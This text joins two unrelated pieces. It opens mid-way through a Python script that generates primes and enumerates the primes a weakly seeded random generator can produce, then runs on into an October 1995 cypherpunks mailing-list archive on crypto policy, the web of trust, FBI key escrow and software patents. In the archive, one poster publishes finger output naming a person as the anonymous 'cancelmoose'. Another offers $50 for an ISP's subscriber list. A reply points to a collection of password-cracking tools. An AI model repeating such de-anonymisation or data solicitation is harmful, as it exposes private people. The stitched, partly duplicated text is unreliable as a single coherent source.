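    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    witness_rng = random.SystemRandom()
    for _ in range(rounds):
        a = witness_rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness that n is composite
    return True


def generate_prime(bits, randbits):
    """Draw random candidates until one passes the primality test.

    randbits(k) must return a random integer of at most k bits. It is the
    only source of entropy for the candidates, so the prime returned is
    determined by the generator's output stream.
    """
    tries = 0
    while True:
        tries += 1
        # Force the top bit (full length) and the low bit (odd).
        candidate = randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate, tries


def primes_from_seed_space(bits, seed_bits):
    """Enumerate every prime a generator with a seed_bits-bit seed can emit."""
    found = set()
    for seed in range(1 << seed_bits):
        weak = random.Random(seed)  # constructed stand-in for a weak RNG
        prime, _ = generate_prime(bits, weak.getrandbits)
        found.add(prime)
    return found


if __name__ == "__main__":
    p, tries = generate_prime(512, secrets.randbits)
    print(f"512-bit prime found after {tries} candidates")

    pool = primes_from_seed_space(256, seed_bits=8)
    print(f"8-bit seed: only {len(pool)} distinct 256-bit primes are possible")
```

With an 8-bit seed the "256-bit" prime is one of at most 256 values, however large it looks.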




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 6 Oct 95 09:35:14 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Graphic encryption
Message-ID: <Pine.3.89.9510061737.A25324-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Oct 1995, Lucky Green wrote:

>And by the way, "proprietary" algorithms are generally junk and should not
>be relied upon by security conscious individuals and businesses. Only
>algorithms that have undergone extensive peer review should be considered
>for use.

It's OK, when these guys were spamming Usenet a few weeks ago with their 
product announcement (admittedly, they did at least keep it to comp 
groups) they said it was export-approved. Therefore, it can be pretty 
much written off from a security standpoint - it's at best as good as 
40-bit RC4, and I sure wouldn't use that for secure communications.

I'd still like to know how it works so we can see just how insecure it 
is, though.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 6 Oct 95 14:42:58 PDT
To: List <cypherpunks@toad.com>
Subject: Microsoft encryption
Message-ID: <Pine.OSF.3.91.951006174218.7617A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any information about the methods used to password 
protect Word documents and Access files? Is there a general way to 
decode these files?

Thanks,
Tim Philp


===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Fri, 6 Oct 95 18:19:33 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <3074DAAB.3D62@netscape.com>
Message-ID: <3075D5AD.76CC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:
> >   If you take a look at verisign's home page, they will be offering
> > "low assurance" certificates for free for non-commercial uses.  The
> > only thing they will guarantee about these certs is that the subject
> > name in the certificate is unique across all certificates signed
> > by their class I CA.  You should be able to get one of these
> > certs in real time via an HTML form.
> 
> What is the point of this?  What is to prevent someone from
> getting certificates for a million of the most common and/or famous names
> as quickly as possible?

Here is a scenario under which it would have a point. This is not totally
secure, but that does not make it useless.

1) Register e-mail addresses.

2) Send the resulting signed certificates back to the registered
   subject name.

3) After you get your signed certificate, mail it to your friend. Now
   your friend can send you signed or encrypted messages.

4) If you ever get a certificate in e-mail from somebody, feel free
   to use the telephone to verify that it is coming from somebody
   you trust.

Remember, the service is free. In this case, I think you will be
getting more than you paid for.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Fri, 6 Oct 95 18:38:06 PDT
To: cypherpunks@toad.com
Subject: Re: CancelMoose = William Nagengast?
In-Reply-To: <ac9b0e3a2f021004e24b@[205.199.118.202]>
Message-ID: <199510070132.SAA26471@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Who cares?

Well, nobody, really. Actually I feel kinda guilty about posting this
in the first place.

> And if I did care who the "cancelmoose" is, I'd care more about the trail
> of evidence "Anonymous" thinks links "cancelmoose" to the eponymous moose
> at panix.com. Name space collisions are hardly convincing.

Sorry. I did leave out one key piece of information:

> host cm.org
cm.org mail is handled by panix3.panix.com
cm.org mail is handled by not-a-firewall.panix.com
cm.org mail is handled by panix4.panix.com
cm.org mail is handled by panix.com
cm.org mail is handled by panix2.panix.com

That, in conjunction with the fact that moose@cm.org is the email
address given for the cancelmoose, does point to the connection.

However, after a little further investigation, I don't think it really
is Mr. Nagengast. It actually appears that panix.com is running a
little remailer. As Dave Winer would say, cooooool.

> Oh, did I tell you I discovered the real identity of Jack the Ripper? A
> finger of ripper@netcom.com reveals some very interesting information. Film
> at 11.

> Once again, anonymity is being used as a cover for cluelessness.

You're right. My sincerest apologies.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 6 Oct 95 18:02:50 PDT
To: cypherpunks@toad.com
Subject: MITM attacks and True Names (again...)
Message-ID: <199510070102.TAA14826@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

What is the difference between having a conversation with a spook 
masquerading as a cypherpunk (or vice versa) and having a conversation 
which is, unbeknownst(sp?) to either of you, monitored and modified by 
a "Man in the Middle" (hereafter: "Mitch", the Man in the Channel)?


The difference is that in the second case there actually is an entity,
separate from the one in control of the other end of your conversation,
with whom you are (sort of) conversing.  Furthermore it is practically
(if not theoretically) possible for that entity to evade Mitch and
contact you directly.  So much for the debate about "talking to public
keys".


(As an aside I fully sympathize with those who rail against the popular
(?) impression that a True Name is somehow necessary to communication.
That is a dangerous idea, since all a True Name is really necessary for
is violence.  (And, pending certain eagerly-awaited technological
developments, for sex.))


Now I have four things to say about this "evasion of Mitch" thing.
Don't worry, they are all short and some of them are interesting.


1.  A dense, strong Web of Trust is very important.  This should 
already be obvious, but point 2 should make it even more so.


2.  It should be each person's responsibility to ensure that their 
true public key has reached the Web of Trust.  If you make a habit of 
delivering copies of your true public key to members of the Web of 
Trust via multiple channels which should be difficult for Mitch to 
intercept, (e.g. snail mail, connections from pay phones to local net 
nodes, courier delivery, phone calls, face-to-face meetings, etc. etc) 
then you can make it arbitrarily difficult for Mitch to keep your true 
public key off the WoT.
  Others can just use the public key for you which they get from the
WoT (of course, they have to make sure that *they* are strongly
connected to the Web by sending their own public key through multiple
channels!).  If other keys show up claiming to be you then we have an
interesting denial-of-service sort of scenario where psychology and
reputation and crypto and all kinds of interesting stuff get mixed in,
but at least we are relatively safe from an un-noticed MITM attack.


3.  There is one other method that can help foil Mitch: the "overload
his processors" trick.  Pay attention to the lag time between
transmission and reception of messages.  Then send a very large
message, or many messages simultaneously.  If it takes longer to get
there (modulo normal processing penalty, normal net lag variation, the
possibility that Mitch was delaying transmissions specifically in
preparation for this trick, etc etc etc) then you know Mitch is in the
channel.  Highly interactive, complex-signal stuff like voice and video
is perfect for this.  Even the NSA can't intercept a PGPFone session
and fake my voice in real time, echoing me when necessary and replacing
my words with other words when necessary.  For this reason PGPFone will
hopefully be quite a boon to the Web O T.  (Thanks to Seb Kuzminsky for
bringing the "overload his processors" trick to my attention.)


4.  Mitch's big opportunity is to strike before the Web is formed.
Once your key is in the Web then his only options are:  1.  acquire
your secret key.  2.  wait til you forget your passphrase and then get
in the middle when you announce a new public key unsigned by the old
one.  or 3.  launch a really mean denial of service attack on you.  
This is one of the reasons that I sign almost all of my outgoing
messages, even to people who don't use PGP.  I can use these
accumulated messages to demonstrate to others that I, Bryce, really was
in control of the PGP public key whose ID is 0x617c6db9 and the one
whose ID is 0x148a11e5 during this time.  This might be important
someday.
  (My *primary* reason for clearsigning everything is to let others know
about PGP's existence and to encourage them to start using it.)


  (And to advertise my cybershop product...)



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMHXRmvWZSllhfG25AQEp7wP/TiLAlfy4S5WeQX8Xgxf0Ng/83UJLffAS
oMrALvPdmTA/wTA1a5/5oUAP/FUTY0uDoR/ELX99yO353B4pljl1yMhk3VW7vNuN
6egklSRsqBBNsJ5qNekDZmuRmxnucCHvn90EXo8BHfyUwGDMksUq77a982aHbYWd
ctF/T35KomQ=
=3hTQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 20:34:26 PDT
To: cypherpunks@toad.com
Subject: Re: CancelMoose = William Nagengast?
Message-ID: <ac9b4284310210042b5f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:32 AM 10/7/95, Syrinx Anonymous Remailer wrote:
...
>Well, nobody, really. Actually I feel kinda guilty about posting this
>in the first place.
...
>Sorry. I did leave out one key piece of information:
>
>> host cm.org
>cm.org mail is handled by panix3.panix.com
...
>However, after a little further investigation, I don't think it really
>is Mr. Nagengast. It actually appears that panix.com is running a
>little remailer. As Dave Winer would say, cooooool.
...
>You're right. My sincerest apologies.

Well, presuming that the two anonymous parties are the same, I'm impressed
that Anonymous was fairly graceful in his comments here.

Good to see, as so many "Anonymous" comments are only flames and insults.

Too bad we don't know who she or he is.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 21:02:00 PDT
To: cypherpunks@toad.com
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510070102.TAA14826@nagina.cs.colorado.edu>
Message-ID: <199510070400.VAA12311@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Although I have been in effect arguing against using unsigned and
uncertified keys, I don't think the PGP web of trust model works that
well either.  I have an essay on this at <URL:
http://www.portal.com/~hfinney/web_of_trust.html>.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Fri, 6 Oct 95 12:08:18 PDT
To: cypherpunks@toad.com
Subject: Council of Europe on Crypto: Finland
Message-ID: <199510061907.VAA17084@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


People have been digging the background of the Council of Europe
recommendations here in Finland.  It has turned out that Finland was
represented by an assistant director of the Criminal Police who is known
as a supporter of extremely broad powers for the police.  At the
meeting, he has apparently presented his personal opinion as the
official opinion of Finland; later the Council unanimously decided to
recommend banning strong crypto.  I hear a representative from Norway
had apparently tried to speak some sense at the meeting, but had
quickly been quieted by the others.

It has also turned out that there have been studies on legislating
cryptography and related issues in Finland during the past two years,
but without concrete plans.  The officials in charge of these issues
were not aware of what was happening in Strasbourg, and what Finland
apparently has presented there certainly does not represent a
consensus within the government.  Things appear to be developing in
promising directions, but much more work is still needed until things
are on the right track.

I strongly urge people in other European countries to contact their
government officials, the press, and use other possible channels to
dig out what exactly was happening and why, and make the officials and
politicians understand the other issues that are related (computer
security, universal surveillance, ability of independent political
groups to function, trade secrets, etc).

Professors and other persons in expert positions are important sources
of information to the government in the preparatory process, and you
should provide the officials with experts to consult on the issues.
At least here it has turned out that preparations were being carried
out with very few independent experts, input coming almost exclusively
from the law enforcement side.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 6 Oct 95 18:14:56 PDT
To: bplib@wat.hookup.net (Tim Philp)
Subject: Re: Microsoft encryption
In-Reply-To: <Pine.OSF.3.91.951006174218.7617A-100000@nic.wat.hookup.net>
Message-ID: <199510070118.VAA05315@homeport.org>
MIME-Version: 1.0
Content-Type: text


| Does anyone have any information about the methods used to password 
| protect Word documents and Access files? Is there a general way to 
| decode these files?

There is a collection of cracking tools on
utopia.hacktic.nl:/pub/replay/cracking





-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Price <billcdi@deltanet.com>
Date: Fri, 6 Oct 95 23:46:10 PDT
Subject: GET EVEN: Realm Internet Systems
Message-ID: <45480r$8oo@news2.deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello to All,

I was recently ripped-off by Realm Internet Systems (realm.net) of Newport Beach, 
CA. They offer extremely poor service and are quite unprofessional.

They have lied to me at every opportunity and I would enjoy teaching them a small 
lesson in etiquette. Brief history: I signed up on March 28th, 1995. Their 
documentation revealed that I 'May or may not' be billed for the entire month if 
service was established close to the end of the month.

I phoned and inquired as to what criteria was used to determine the billing period. I 
was assured that I would not be charged for the remaining two days - They lied!

They billed me for three months use and a set-up fee. One months billing was a 'last 
month's' fee. They ignored most all requests for assistance or information and their 
system malfunctioned often.

I informed them of my planned three months travel to Russia and inquired about 
having my mail forwarded. They said no and suggested that I Telnet for retrieval. I 
asked about a reduced semi-active account rate and they reluctantly agreed to 
revert my account to a shell account for $15 per month (PPP was $35).

They did not do this and continually charged me $35 in my absence. As I had 
allocated only sufficient funds on my charge card for the $15 charges, the available 
balance was soon exceeded and Realm Internet Systems cancelled my service.

I begged them to reinstate for one month until I returned (they had credit owed me 
for overbilling and last month's fee) - they refused! When I returned from Moscow, I 
mailed them a check immediately for two months usage (one week for charging 
charge card as payment would not post immediately).

They reinstated my account for one month. Their system was unoperational for two 
weeks and they refused to acknowledge the problem. After many frustrating hours 
trying to diagnose my system, I finally reached a technician who admitted they had 
a problem.

The problem was never fixed and the receptionist was having a wonderful time 
taunting me and placing me on hold after each five words or so that I could say. I 
finally threatened to physically visit their office and resolve the problem. 

The owner came to the phone and would not reveal his name. He laughed at me and 
suggested that I @$*& Off. They refuse to refund the $115 owed to me. 

I signed up with Delta Internet Services in Anaheim, CA. They are a first rate 
company. Too bad I did not know of them before. Well, the point of all of this 
(thanks for your patience) is that I want to let other subscribers of Realm know they 
are not alone.

If anyone in your group could somehow obtain a list of <realm.net> subscribers, I 
would like to mail each of them a description of my problem and suggest they 
consider Delta Internet Services.

I will pay a modest $50 cash for this information. You may provide me anonymously. 
<billcdi@deltanet.com>.

Thanks,
Bill Price






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Fri, 6 Oct 95 14:22:47 PDT
To: cypherpunks@toad.com
Subject: CancelMoose = William Nagengast?
Message-ID: <199510062121.WAA28108@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I did a little digging around, and came up with the following identity
for the cancelmoose:

> finger moose@panix.com
[panix.com]
Login Name: moose                       Full Name: William Nagengast 
Directory: /net/u/11/m/moose            Shell: /usr/local/bin/psh
Last login Wed Nov  9 17:21:18 on panix.com ttyq2 from ts3.nyc.access.n.
No mail information available.

Is this publicly known information?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 7 Oct 95 01:51:53 PDT
To: cypherpunks@toad.com
Subject: secure split; secure device
Message-ID: <199510071224.HAA00025@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,
   I am looking for Secure Split and for the latest version of secure device.
I've got secure device 1.3. Is that the latest?  Yours Truly, Gary Jeffers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 7 Oct 95 05:36:37 PDT
To: cypherpunks@toad.com
Subject: FBI intentions [Re: Where is text of wiretap bill]
In-Reply-To: <951006.165006.5n9.rnr.w165w@cybrspc.mn.org>
Message-ID: <199510071236.FAA05136@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> In list.cypherpunks, jim@acm.org writes:

>> An assistant director of the FBI, William Baugh, spoke recently at the ICI
>> conference in DC.  He said he hoped American industry would be cooperative
>> in making the voluntary compliance with TESSERA or other GAK widespread,
>> because if it doesn't happen then they would need to come back and get
>> more Congressional action, and "we found the coercive solution we had to
>> use for Digital Telephony very draining."

> roy@cybrspc.mn.org (Roy M. Silvernail) writes:

> I shouldn't be surprised to see this, but it does strike me as pretty
> blatant.  Aren't the Fibbies supposed to be putting a less threatening
> spin on this stuff?  Or are the gloves coming off?

The latter, assuming the gloves were ever on.  In the previous day's
presentations at the ICI conference, FBI Dir. Freeh spoke about the need
for the FBI to get not only decryptable wiretaps but also decryptable
files, and pointed out that some of the proposals about limited-duration
keys would not let them decrypt files they seized with a legal warrant if
those files had been encrypted earlier than the warrant date.  He took Q&A
for a while, and I got to ask the first Q:

Q: Does the Bureau favor making escrowed keys mandatory for domestic
   encryption?
A: Not at this time.  We hope that voluntary compliance and cooperation
   from industry will result in companies developing a single system for
   export and for domestic use.  If this does not happen, then we will
   need to take further action.

	Jim Gillogly
	16 Winterfilth S.R. 1995, 12:33




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sat, 7 Oct 95 03:53:08 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <3075BB6D.3A91@netscape.com>
Message-ID: <199510071052.GAA22544@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



>   And how do you define a "known secure server"?
> 
> 	--Jeff


You would have to ask Open Market, Inc. I am
just reporting the news..

/hawk

> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sat, 7 Oct 95 03:55:56 PDT
To: sameer@c2.org (sameer)
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <199510062337.QAA17601@infinity.c2.org>
Message-ID: <199510071054.GAA22560@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes.. they mean that if you have a version of any commercial server
and someone finds a hole.. they will make one of theirs available.

/hawk
> 
> 	I think they mean "our server" by "known secure server."
> 
> 	I'm getting quite sick of people who think their system is
> secure just because it hasn't been broken.
> 
> 
> > 
> > Harry S. Hawk wrote:
> > > 3) Offer a free upgrade problem for people who have a server that has
> > >    had a security breach. They can download a known secure server.
> > 
> >   And how do you define a "known secure server"?
> > 
> > 	--Jeff
> > 
> > -- 
> > Jeff Weinstein - Electronic Munitions Specialist
> > Netscape Communication Corporation
> > jsw@netscape.com - http://home.netscape.com/people/jsw
> > Any opinions expressed above are mine.
> > 
> 
> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> An Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 


-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Oct 95 06:19:50 PDT
To: cypherpunks@toad.com
Subject: UNA_fim
Message-ID: <199510071319.JAA09731@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-95. NYPaper:


   "Got Killer Chips on Our Minds." (Film review)

      Why are computers so often portrayed as turning truth
      into lies and making our brains go haywire? Are we
      frightened? Do audiences love their computers? Probably
      not, movies say. Hal's evil-spirited descendants are all
      around us, threatening to take over intelligence,
      emotions, Social Security numbers and every other little
      thing that makes us civilized. All this tends to put a
      damper on the idea that we are a nation eager to embrace
      a wonderful new technology. While it makes sense that
      film makers would pounce on a flourishing, quickly
      growing, subject like computers, it doesn't necessarily
      follow that all those computers would be so destructive.
      But there are no movies right now in which a nice
      friendly computer wears tennis shoes and does something
      heroic. Instead, films are suggesting that we are a
      nation of secret technophobes, distrustful of a
      technology hurtling toward us faster than we can cry
      "Stop!" or run to the store for another self-deprecating
      book like "Windows '95 for Dummies" or "The Complete
      Idiot's Guide to Windows '95" (both actual titles).


   UNA_fim  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T. Bruce Tober" <Octobersdad@crecon.demon.co.uk>
Date: Sat, 7 Oct 95 12:09:33 PDT
Subject: European Crypto
Message-ID: <877045118wnr@crecon.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anyone with names and contact information for any of the Council of Europe 
representatives who deliberated and/or voted on the recent recommendations 
on crypto, e-mail me that information. Likewise any information on 
any further actions by the EU in this regard. Working on an article for 
a computer magazine.

tbt




-- 

|Bruce Tober - octobersdad@crecon.demon.co.uk - B'ham, Eng|
|  Publisher/Editor of The Write Byte monthly newsletter  |
|            WebSite address to come shortly              |
| TWB - The computer newsletter specifically for Writers  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T. Bruce Tober" <Octobersdad@crecon.demon.co.uk>
Date: Mon, 9 Oct 95 12:58:25 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: European Crypto
Message-ID: <199510091831.LAA09772@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone with names and contact information for any of the Council of Europe 
representatives who deliberated and/or voted on the recent recommendations 
on crypto, e-mail me that information. Likewise any information on 
any further actions by the EU in this regard. Working on an article for 
a computer magazine.

tbt




-- 

|Bruce Tober - octobersdad@crecon.demon.co.uk - B'ham, Eng|
|  Publisher/Editor of The Write Byte monthly newsletter  |
|            WebSite address to come shortly              |
| TWB - The computer newsletter specifically for Writers  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Sat, 7 Oct 95 07:44:57 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts
Message-ID: <199510071424.AA00279@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
> >James A. Donald wrote:
> > Crazy no.  Their objective is to create a surveillance state, where 
> > all actions are known and recorded by the state, in order to 
> > facilitate detailed state control over every aspect of our lives.  Our 
> > agenda is the opposite.  There is no commonality of purpose, hence no 
> > possibility of cooperation.   
> 
>And Perry Metzger replied:
> I disagree. Most NSA types are probably stock government employees who
> want to get their job done with the least muss and fuss. Some of them
> actually have pride in their work. Very few of them are likely
> actively evil.

Need I point out that pride in one's work is not necessarily exclusive
of evil?  Rarely does anyone actually think of themselves as evil --
and those few who do are usually just harmless nuts.  The most evil
and destructive people throughout history have always thought of
themselves as good people, doing good work.  As the saying goes, the
most effective con men are those who believe their own cons.

Is there anyone here who seriously doubts that if the international
intelligence community successfully implements any significant part of
their openly-expressed agenda, it will constitute the most gigantic
threat to human freedom that mankind has ever faced?  If that isn't
evil, I don't know what is.

By the way, I don't necessarily agree that the main objective of the
surveillance state is to facilitate detailed control of our lives.  I
think the objective of the international intelligence community, like
virtually every political organization, is simply to accumulate more
money and power to themselves.  Unfortunately, their method of doing
this is particularly destructive and dangerous to human rights.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHaNRF11Wd4tm8clAQHNfgP/Y4N5JNpr0IwZY2UQFDjw5ootMUdwXLFq
oW9MirShBBNn6xLyJBNBG7Po8hd3cUrmzqC6qWMiyWAROXPOTjUfJYiI2ziPIX4P
xL3hos2+EwSWuveEKndh6kRgQ8MeknOfhnpJxKosbvZ1nLxYXUI+CmnNNTnN042y
o/uQlHpoHtU=
=UMP0
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 7 Oct 95 08:15:46 PDT
To: cypherpunks@toad.com
Subject: Re: FBI intentions
Message-ID: <199510071510.LAA83825@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

Jim Gillogly asked FBI Dir. Freeh:

>Q: Does the Bureau favor making escrowed keys mandatory for domestic
>   encryption?

And FBI Dir. Freeh replied:

>A: Not at this time.  We hope that voluntary compliance and cooperation
>   from industry will result in companies developing a single system for
>   export and for domestic use.  If this does not happen, then we will
>   need to take further action.

Translation: "Not 'till after the election, Jim."
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMHaYN21lp8bpvW01AQGJNgP9GeFHaT6+BF0XQCqPUSAygcIL2CAsg6hw
vcb+h9CRjdMZYCrbryL8CGU7A6ZLNXhUuG9RDytfCsD/l41p2jNtV9XztTgHFWXf
R4RmJu6miXpja/30s/TyuvFlJIl5lKxrHmkYvTK4T9xS+G80hu/1btL+XfViSZG6
wkUguTzH1QE=
=dxMb
-----END PGP SIGNATURE-----
Regards, Jim Ray

 "Every act of visibility is an act of resistance." Suzanne Pharr
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Grubs (W8GRT)" <jgrubs@webcasters.com>
Date: Sat, 7 Oct 95 09:42:13 PDT
To: "cypherpunks@toad.com>
Subject: Kerserver keyrings
Message-ID: <199510071639.MAA29272@norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: Jim Grubs (W8GRT) * EMC.Ver #2.5.02 ] --
 Attachment: mailsig Code: 0006727      \ Created: 10-03-95, 07:16 PM [1 Kb]

Someone at Uni-Hamburg must have seen my message and said, "Oops, who turned
that off?" Anyway, their keyring was updated today. It's 6.4 megs!!!! (My
first HD was only 10.)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Oct 95 12:56:08 PDT
To: cypherpunks@toad.com
Subject: Software Patents are Freezing Evolution of Products
Message-ID: <ac9c0ed8360210042ca0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



INTRODUCTION

I'm finally going to write down some of my evolving views on why software
patents are fraught with dangers. Yes, many of you are no doubt already
convinced that software patents (XOR cursor, RSA, digicash, etc.) are a Bad
Idea, but I have a different angle on this which I'd like to present.

SUMMARY

Thesis: Software patents are a bad idea because they freeze the evolution
too early and payment metering schemes are too difficult to arrange, which
also helps to freeze evolution. Software patents are bad because customers
cannot freely and without entanglements incorporate the ideas into their
own products. The situation has become much worse with software, because
there is no physical object which can be used to meter usage of a patent.


HOW PATENTS WORK WITH PHYSICAL OBJECTS

Before explaining this thesis, let's look at how patents work with
_physical_ inventions, even if those inventions embody abstract process or
software inventions.

The microprocessor is a good example, which I'll use here for most of my
examples. (Note that Intel did not try to patent the "basic idea" of the
microprocessor; Gilbert Hyatt claims he filed before Intel produced the
first 4004, but this claim and the swirl of issues around the Patent
Office's granting of a patent to him are a separate topic.)

A microprocessor chip incorporates numerous items that are patented,
copyrighted, or that have trade secret status. Some of these patents, etc.,
even involve design tools used to design the chip. And some of the patents
involve sophisticated production methods. And yet a customer can simply
*buy* the chips and use them as he *wishes*, in hamburger cookers or in
digital money schemes, without any further regard for the patents. No
entanglements.

You go down to Fry's Electronics, buy some Pentiums or PPCs and use them as
you wish. No permissions needed from Intel or Motorola, no complex license
agreements saying you won't use the chips to compete with Intel's board
business or with Motorola's cellular phone business, no restrictions (save
for government laws about munitions, etc.) on who you can resell the chips
or systems to.

That is, the whole set of patent and copyright issues is _encapsulated_ or
_reified_ into the instance being sold. The physical object carries the
embodiment of the patents (including the process patents used to fabricate
the chip: the user of such a chip can be oblivious to these patents and
need not worry that a design will infringe on these patents).

[Sidenote: The astute observer will note some conceptual similarities to
"on-line clearing," to a "cash-and-carry" business. Once you've paid your
money and taken delivery of your 486 or your laser or your widget, how you
incorporate it into future products is generally your business and yours
alone. I say "generally," and legal beagles will point out that some
hardware sales may have restrictions placed on what can be done with the
hardware. Contracts are always possible. But for most objects, there is no
such additional contract. The widget seller has made his money by the sale
of his widget and cannot really try too hard to make more "downstream"
money, except by modifying his future prices to reflect what he perceives
demand to be.]


SOFTWARE IS REPLICABLE

Hardware objects cannot be easily replicated, and hence patents can be
reified into the objects. Software objects of course _can_ be easily
replicated, which is why convoluted licensing and complex payment contracts
are involved.

(This is an incredibly important distinction, and one which also relates
closely to why "software ICs" and "object widgets" are not built, sold,
